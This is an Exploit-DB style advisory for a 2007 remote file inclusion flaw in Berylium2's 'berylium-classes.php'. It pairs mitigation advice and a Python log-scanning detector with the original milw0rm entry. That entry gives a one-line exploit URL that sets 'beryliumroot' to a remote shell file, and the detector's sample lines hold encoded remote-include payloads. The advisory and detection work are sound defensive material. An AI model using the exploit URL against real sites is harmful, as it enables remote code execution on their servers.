Vendor: Berylium2
By: ThE TiGeR
CVSS: 5.5 (MEDIUM)
CWE: Remote file inclusion
Product Name: Berylium2
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Berylium2 Remote file inclusion

This exploit allows an attacker to include remote files through the 'berylium-classes.php' script in Berylium2. By manipulating the 'beryliumroot' parameter, an attacker can include a malicious file hosted on a remote server.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and validate the source of included files. Users are advised to update to a patched version of Berylium2.
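
For sites that still run the affected script, requests that set the parameter can be flagged in web server logs. The following is an added detection example, not part of the original advisory or of Berylium2: it assumes combined-format access logs, inspects only the query string, and runs over constructed sample lines.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that points off-host or at a stream wrapper: scheme://, data:, or //host
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)', re.I)
TARGET_SCRIPT = "/berylium-classes.php"   # script named on this page
TARGET_PARAM = "beryliumroot"             # parameter named on this page

# Constructed sample log lines (documentation IPs and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /be2/index.php?page=home HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /be2/code/berylium-classes.php?beryliumroot=http://files.example.invalid/x.txt? HTTP/1.1" 200 90',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /be2/code/berylium-classes.php?beryliumroot=%2568ttp%253A%252F%252Ffiles.example.invalid%252Fx.txt HTTP/1.1" 200 90',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /be2/code/berylium-classes.php?beryliumroot=../lib HTTP/1.1" 200 90',
]


def fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding so the scheme check sees plain text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(log_line):
    """Return 'remote', 'supplied' or None for one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not fully_unquote(url.path).endswith(TARGET_SCRIPT):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == TARGET_PARAM:
            # The include root should never be set by the request at all.
            return "remote" if REMOTE_RE.match(fully_unquote(value)) else "supplied"
    return None


def scan(lines):
    """Return [(line_number, verdict)] for every line that sets the parameter."""
    verdicts = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in verdicts if v]
```

A "supplied" verdict is worth reviewing even without a remote URL, since the include root is not something a client request should control.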

Exploit-DB raw data:

#Berylium2 Remote file inclusion

#Download script : http://berylium.org/source/be2-2003-08-18.tar.gz

#Thanks Str0ke

#Exploit :

#http://victim.com/[berylium2_path]/code/berylium-classes.php?beryliumroot=shell.txt?

#Discovered by : ThE TiGeR

#Miro_Tiger[at]hotmail[dot]com

#Greetz : ™~${{BraveHeart}}$~™

# milw0rm.com [2007-05-07]